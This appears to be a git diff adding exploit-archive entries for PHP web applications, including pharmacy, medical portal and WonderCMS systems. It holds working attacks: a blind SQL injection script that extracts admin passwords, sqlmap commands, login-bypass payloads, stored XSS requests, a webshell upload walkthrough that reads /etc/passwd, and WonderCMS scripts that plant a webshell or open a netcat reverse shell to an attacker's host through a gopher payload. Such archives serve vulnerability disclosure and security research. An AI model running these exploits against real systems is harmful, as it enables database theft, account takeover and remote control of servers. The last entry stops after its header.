+    parser = argparse.ArgumentParser(description=desc)
+    exp_option = parser.add_argument_group('')
+    parser.add_argument("--exploit", help ="", action='store_true')
+    parser.add_argument("--url",help="", type=str, required=False)
+    parser.add_argument("--payload",help="",type=str,required=False)
+
+    args = parser.parse_args()
+
+    if args.exploit:
+
+        if args.url:
+
+            if args.payload:
+                url = args.url
+                payload = args.payload
+                vuln_reflected(url, payload)
+
+if name == 'main':
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49131.txt b/exploits/php/webapps/49131.txt
new file mode 100644
index 000000000..55e551ee1
--- /dev/null
+++ b/exploits/php/webapps/49131.txt
@@ -0,0 +1,11 @@
+# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-08-20
+# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+# Description
+This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.
+
+#POC
+sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
\ No newline at end of file
diff --git a/exploits/php/webapps/49132.py b/exploits/php/webapps/49132.py
new file mode 100755
index 000000000..db4db365c
--- /dev/null
+++ b/exploits/php/webapps/49132.py
@@ -0,0 +1,83 @@
+# Exploit Title: Pharmacy/Medical Store & Sale Point 1.0  - 'email' SQL Injection
+# Date: 2020-08-23
+# Exploit Author: @naivenom
+# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
+# Version: 1.0
+# Tested on: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+
+This parameter "email" is vulnerable to Time-Based blind SQL injection
+in this path "/medical/login.php " that leads to retrieve all
+databases.
+
+#exploit
+
+import re
+import requests
+from bs4 import BeautifulSoup
+import sys
+import urllib3
+import time
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# We can test the time based blind sqli with this script. This script
+testing with each character of the password column from users name
+table
+
+# and retrieve password from admin user.
+
+def time_based_blind_sqli(injection_string):
+
+    target = "http://localhost:81/medical-store-source/login.php"
+
+    for j in range(32,126):
+
+        data = {'email': "%s" % (injection_string.replace("[CHAR]", str(j))),
+
+        'password':'xJXb',
+
+        'login':''}
+
+        tim = time.time()
+
+        r = requests.post(target,data = data, verify=False)
+
+        nowtime = time.time()
+
+        curren = nowtime-tim
+
+        if curren <= 4:
+
+            return j
+
+    return None
+
+def main():
+
+    print("\n(+) Retrieving password from admin user...")
+
+    # 5 is length of the password. This can
+
+    # be dynamically stolen from the database as well!
+
+    for i in range(1,5):
+
+        injection_string = "admin@admin.com' AND (SELECT 1100 FROM
+(SELECT(SLEEP(4-(IF(ORD(MID((SELECT IFNULL(CAST(password AS
+NCHAR),0x20) FROM store.users ORDER BY password LIMIT
+0,1),%d,1))>[CHAR],0,1)))))soLu) AND 'yHIV'='yHIV" % i
+
+        extracted_char = chr(time_based_blind_sqli(injection_string))
+
+        sys.stdout.write(extracted_char)
+
+        sys.stdout.flush()
+
+    print("\n(+) done!")
+
+
+
+if __name__ == "__main__":
+
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49135.txt b/exploits/php/webapps/49135.txt
new file mode 100644
index 000000000..835a348be
--- /dev/null
+++ b/exploits/php/webapps/49135.txt
@@ -0,0 +1,115 @@
+# Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
+# Date: 01-11-2020
+# Exploit Author: yunaranyancat
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
+# Version: 1.0
+# Tested on: Ubuntu 18.04 + XAMPP 7.4.11
+
+Summary: 
+
+Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities.
+
+# POC No.1
+Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field 
+
+### Sample request POC #1
+
+POST /TableReservation/dashboard/profile.php HTTP/1.1
+Host: [TARGET URL/IP]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 122
+Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save
+
+# POC No.2
+Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php
+
+### Sample request POC #2
+
+POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
+Host: [TARGET URL/IP]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php
+Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622
+Content-Length: 321
+Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------424640138424818065256966622
+Content-Disposition: form-data; name="tablename"
+
+<script>alert("XSS")</script>
+-----------------------------424640138424818065256966622
+Content-Disposition: form-data; name="addtable"
+
+Add Table
+-----------------------------424640138424818065256966622--
+
+
+# POC No. 3
+Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Item Name field in menu-add.php
+
+# POC No. 4
+Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php
+
+# POC No. 5
+Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food_type) dropdown to XSS payload in menu-add.php
+
+### Sample request POC #3, #4 & #5
+
+POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
+Host: [TARGET URL/IP]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php
+Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499
+Content-Length: 6641
+Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------165343425917898292661480081499
+Content-Disposition: form-data; name="itemname"
+
+<script>alert("XSS1")</script>
+-----------------------------165343425917898292661480081499
+Content-Disposition: form-data; name="price"
+
+1
+-----------------------------165343425917898292661480081499
+Content-Disposition: form-data; name="madeby"
+
+<svg onload=alert("XSS2")>
+-----------------------------165343425917898292661480081499
+Content-Disposition: form-data; name="food_type"
+
+<svg onload=prompt("XSS4")>
+-----------------------------165343425917898292661480081499
+Content-Disposition: form-data; name="image"; filename="image.jpeg"
+Content-Type: image/jpeg
+
+..
+[REDACTED CONTENT OF image.jpeg]
+..
+
+----------------------------165343425917898292661480081499
+Content-Disposition: form-data; name="addItem"
+
+Add Item
+-----------------------------165343425917898292661480081499--
\ No newline at end of file
diff --git a/exploits/php/webapps/49136.txt b/exploits/php/webapps/49136.txt
new file mode 100644
index 000000000..a611f2125
--- /dev/null
+++ b/exploits/php/webapps/49136.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-09-18
+# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Select Measurement Settings and click on "Set Measurement Parts".
+Step 3: Create any php payload on locally on your system. ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php)
+Step 4: Fill the required details and upload the php payload you created using the image upload field.
+Step 5: Select Measurement Settings and click on "View/Edit Measurement Parts".
+Step 6: Start netcat listener.
+Step 7: Use the search filter to find your measurement and click on "edit" to trigger the php payload.
+
+========================== OR ==========================
+
+Step 1: Embed an image with the code "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg"
+Step 2: Rename the malicious image to have include a ".php" extention. Example ( mv r0b0t.jpg r0b0t.jpg.php )
+Step 3: Log in to the CMS with any valid user credentials.
+Step 4: Select Measurement Settings and click on "Set Measurement Parts".
+Step 5: Fill the required details and upload malicious image you created using the image upload field.
+Step 6: Select Measurement Settings and click on "View/Edit Measurement Parts".
+Step 7: Use the search filter to find your measurement and click on "edit" to edit details.
+Step 8: Righ click on the broken image and copy image location.
+Step 9: Paste image location in browser and you will have RCE. ( http://localhost/img/part/r0b0t.jpg.php?cmd=cat /etc/passwd )
\ No newline at end of file
diff --git a/exploits/php/webapps/49137.txt b/exploits/php/webapps/49137.txt
new file mode 100644
index 000000000..94857d566
--- /dev/null
+++ b/exploits/php/webapps/49137.txt
@@ -0,0 +1,41 @@
+# Exploit Title: LEPTON CMS 4.7.0  - 'URL' Persistent Cross-Site Scripting
+# Date: 19-11-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://lepton-cms.org/
+# Software Link: https://lepton-cms.org/english/download/archive.php
+# Version: 4.7.0
+# Tested on: Windows 10/Kali Linux
+# CVE: CVE-2020-29240
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
+
+Vulnerable Parameters: Pages URL.
+
+Steps-To-Reproduce:
+1. Login to the Admin Account 
+2. Go to the Menu-Pages-Pages Overview.
+3. Now edit any page
+4. Put the below payload in the url input box.
+5.ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)>
+
+POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1
+Host: localhost
+Connection: close
+Content-Length: 130
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: https://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153
+
+page_id=1&section_id=1&url=https%3A%2F%2Flocalhost%2F_packinstall%2F%22onmouseover%3Dprompt%28%2Fxss%2F%29%3E+&height=900
\ No newline at end of file
diff --git a/exploits/php/webapps/49138.txt b/exploits/php/webapps/49138.txt
new file mode 100644
index 000000000..403e86f9c
--- /dev/null
+++ b/exploits/php/webapps/49138.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Medical Center Portal Management System 1.0 - 'login' SQL Injection
+# Dork: N/A
+# Date: 2020-11-26
+# Exploit Author: Aydın Baran Ertemir
+# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali Linux
+
+# POC:
+# 1)
+# http://localhost/medic/pages/login.php
+#
+POST /medic/pages/processlogin.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/medic/pages/login.php
+Cookie: PHPSESSID=ef7226c5aa187ed19ce1815df30e079e
+Upgrade-Insecure-Requests: 1
+
+user=1%27+or+1%3D1%23&password=1%27+or+1%3D1%23&btnlogin=
\ No newline at end of file
diff --git a/exploits/php/webapps/49139.txt b/exploits/php/webapps/49139.txt
new file mode 100644
index 000000000..ac0498f37
--- /dev/null
+++ b/exploits/php/webapps/49139.txt
@@ -0,0 +1,110 @@
+# Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
+# Date: 11-14-2020
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://pandorafms.com/
+# Software Link: https://pandorafms.com/community/get-started/
+# Version: Pandora FMS 7.0 NG 749
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS.
+# Vulnerable Parameters : name, description
+# Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b
+
+
+#POC
+
+POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 132
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+Upgrade-Insecure-Requests: 1
+
+name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS.
+# Vulnerable Parameters : manufacturer, description
+# Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0
+
+
+#POC
+
+POST /pandora_console/ajax.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641
+Content-Length: 846
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+
+-----------------------------195778570630678476283866516641
+Content-Disposition: form-data; name="is_new"
+
+1
+-----------------------------195778570630678476283866516641
+Content-Disposition: form-data; name="page"
+
+godmode/modules/private_enterprise_numbers
+-----------------------------195778570630678476283866516641
+Content-Disposition: form-data; name="method"
+
+add
+-----------------------------195778570630678476283866516641
+Content-Disposition: form-data; name="pen"
+
+123
+-----------------------------195778570630678476283866516641
+Content-Disposition: form-data; name="manufacturer"
+
+<img src=a onerror=alert(1)>
+-----------------------------195778570630678476283866516641
+Content-Disposition: form-data; name="description"
+
+<img src=a onerror=alert(1)>
+-----------------------------195778570630678476283866516641--
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS.
+# Vulnerable Parameters : name, description
+# Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70
+
+
+# POC
+
+POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 316
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+Upgrade-Insecure-Requests: 1
+
+id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create
\ No newline at end of file
diff --git a/exploits/php/webapps/49140.txt b/exploits/php/webapps/49140.txt
new file mode 100644
index 000000000..2f8e769d1
--- /dev/null
+++ b/exploits/php/webapps/49140.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Social Networking Site - Authentication Bypass (SQli)
+# Date: 2020-11-17
+# Exploit Author: gh1mau 
+# Email: gh1mau.rulez@gmail.com
+# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
+# Vendor Homepage: https://www.sourcecodester.com/php/14601/social-networking-site-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14601&title=Social+Networking+Site+in+PHP%2FMySQLi+with+Full+Source+Code
+# Software Release Date: November 17, 2020
+# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
+
+Vulnerable File:
+---------------- 
+/signin_form.php
+
+Vulnerable Code:
+-----------------
+Entry point:
+
+line 7: $email=$_POST['email'];
+line 8: $password=$_POST['password'];
+
+Exit point:
+line 10: $result = mysqli_query($con,"SELECT * FROM user WHERE email = '$email' and password='$password'");
+
+Vulnerable Issue:
+-----------------
+Attacker could bypass the authentication using simple sqli login bypass payload
+
+	username: gh1mau@gh1mau.com
+	password: ' or '1'='1
\ No newline at end of file
diff --git a/exploits/php/webapps/49149.txt b/exploits/php/webapps/49149.txt
new file mode 100644
index 000000000..8335780dd
--- /dev/null
+++ b/exploits/php/webapps/49149.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
+# Google Dork: N/A
+# Date: 1.12.2020
+# Exploit Author: Aydın Baran Ertemir
+# Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Kali Linux
+
+Use SQLMAP:
+
+sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch
\ No newline at end of file
diff --git a/exploits/php/webapps/49154.py b/exploits/php/webapps/49154.py
new file mode 100755
index 000000000..a5654d435
--- /dev/null
+++ b/exploits/php/webapps/49154.py
@@ -0,0 +1,77 @@
+# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
+# Date: 2020-11-27
+# Exploit Author: zetc0de
+# Vendor Homepage: https://www.wondercms.com/
+# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
+# Version: 3.1.3
+# Tested on: Ubuntu 16.04
+# CVE : N/A
+
+# WonderCMS is vulnerable to SSRF Vulnerability.
+# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
+# The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost.  
+# when the attacker can pointing the request to localhost, this lead to SSRF vulnerability. 
+# the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000
+# 
+# python exploit.py
+# [+] Getting Token
+# [+] Sending payload
+# [+] Get reverse shell
+
+# nc -lnvp 1234
+# Connection from 192.168.43.103:56956
+# /bin/sh: 0: can't access tty; job control turned off
+# $ whoami
+# www-data
+# $
+
+import requests
+from bs4 import BeautifulSoup
+from termcolor import colored
+from time import sleep
+
+print(colored('''
+
+\ \      /_ \  \ | _ \ __| _ \  __|  \  |  __| 
+ \ \ \  /(   |.  | |  |_|    / (    |\/ |\__ \ 
+  \_/\_/\___/_|\_|___/___|_|_\\___|_|  _|____/ 
+                                               
+------[  SSRF to Remote Code Execution ]------
+	''',"blue"))
+
+
+loginURL = "http://wonder.com/loginURL"
+password = "GpIyq0RH"
+lhost = "192.168.43.66"
+lport = "1234"
+payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport)
+
+
+r = requests.session()
+data = { "password" : password }
+page = r.post(loginURL,data)
+if "Wrong" in page.text:
+	print(colored("[!] Exploit Failed : Wrong Credential","red"))
+	exit()
+
+print(colored("[+] Getting Token","cyan"))
+soup = BeautifulSoup(page.text, "html.parser")
+
+allscript  = soup.find_all("script")
+no = 0
+for i in allscript:
+	if "rootURL" in str(i):
+		url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
+	elif "token" in str(i):
+		token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
+
+
+def sendPayload(req,url,payload,token):
+	getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
+	req.get(getShell)
+
+print(colored("[+] Sending payload","cyan"))
+sleep(1)
+print(colored("[+] Get reverse shell","cyan"))
+sendPayload(r,url,payload,token)
+print(colored("[+] Good bye","cyan"))
\ No newline at end of file
diff --git a/exploits/php/webapps/49155.py b/exploits/php/webapps/49155.py
new file mode 100755
index 000000000..3c55f42ed
--- /dev/null
+++ b/exploits/php/webapps/49155.py
@@ -0,0 +1,103 @@
+# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution
+# Date: 2020-11-27
+# Exploit Author: zetc0de
+# Vendor Homepage: https://www.wondercms.com/
+# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
+# Version: 3.1.3
+# Tested on: Ubuntu 16.04
+# CVE : N/A
+
+
+# WonderCMS is vulnerable to Authenticated Remote Code Execution.
+# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
+# Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE.
+
+# python3 exploit.py http://wonder.com/loginURL GpIyq0RH 
+# -------------
+# [+] Getting Token
+# [+] Sending Payload
+# [+] Get the shell
+# [+] Enjoy!
+# $id
+# uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+import requests
+import sys
+import re
+from bs4 import BeautifulSoup
+from termcolor import colored
+
+
+print(colored('''
+
+\ \      /_ \  \ | _ \ __| _ \  __|  \  |  __| 
+ \ \ \  /(   |.  | |  |_|    / (    |\/ |\__ \ 
+  \_/\_/\___/_|\_|___/___|_|_\\___|_|  _|____/ 
+                                               
+------[ Auth Remote Code Execution ]------
+	''',"blue"))
+
+if len(sys.argv) != 3:
+    print(colored("[-] Usage : ./wonder.py loginURL password","red"))
+    exit()
+
+loginURL = sys.argv[1]
+password = sys.argv[2]
+
+r = requests.session()
+data = { "password" : password }
+page = r.post(loginURL,data)
+if "Wrong" in page.text:
+	print(colored("[!] Exploit Failed : Wrong Credential","red"))
+	exit()
+
+print(colored("[+] Getting Token","blue"))
+soup = BeautifulSoup(page.text, "html.parser")
+
+allscript  = soup.find_all("script")
+no = 0
+for i in allscript:
+	if "rootURL" in str(i):
+		url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
+	elif "token" in str(i):
+		token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
+
+payload = "https://github.com/zetc0de/wonderplugin/archive/master.zip"
+
+def sendPayload(req,url,payload,token):
+	getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
+	req.get(getShell)
+	shell = url + "plugins/wonderplugin/evil.php"
+	checkshell = req.get(shell)
+	if "1337" in checkshell.text:
+		return True
+	else:
+		return False
+
+print(colored("[+] Sending Payload","blue"))
+shell = sendPayload(r,url,payload,token)
+
+
+if shell == True:
+	print(colored("[+] Get the shell","blue"))
+	print(colored("[+] Enjoy!","blue"))
+	shell = url + "plugins/wonderplugin/evil.php"
+	while True:
+		cmd = input("$")
+		data = { "cmd" : cmd }
+
+		res = r.post(shell,data)
+		if res.status_code == 200:
+			print(res.text)
+elif shell == False:
+	print(colored("[+] Get the shell","blue"))
+	print(colored("[+] Enjoy!","blue"))
+	shell = url + "plugins/wonderplugin-master/evil.php"
+	while True:
+		cmd = input("$")
+		data = { "cmd" : cmd }
+		res = r.post(shell,data)
+		if res.status_code == 200:
+			print(res.text)
+else:
+	print(colored("[!] Failed to exploit","red"))
\ No newline at end of file
diff --git a/exploits/php/webapps/49164.txt b/exploits/php/webapps/49164.txt
new file mode 100644
index 000000000..753f85c8a
--- /dev/null
+++ b/exploits/php/webapps/49164.txt
@@ -0,0 +1,34 @@
+# Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: Windows 10/Kali Linux
+# Contact: https://www.linkedin.com/in/hemantsolo/
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Menu.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>"
+3. Now go to the website and the XSS will be triggered.
+
+GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+DNT: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: 127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93
\ No newline at end of file
diff --git a/exploits/php/webapps/49173.txt b/exploits/php/webapps/49173.txt
new file mode 100644
index 000000000..196de0acf
--- /dev/null
+++ b/exploits/php/webapps/49173.txt
@@ -0,0 +1,20 @@
+#Exploit Title: Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality
+#Date: 2020-11-11
+#Exploit Author: Mufaddal Masalawala
+#Vendor Homepage: https://www.anuko.com/
+#Software Link: https://www.anuko.com/time-tracker/index.htm
+#Version: 1.19.23.5311
+#Tested on: Kali Linux 2020.3
+#CVE: CVE-2020-27423
+#Proof Of Concept:
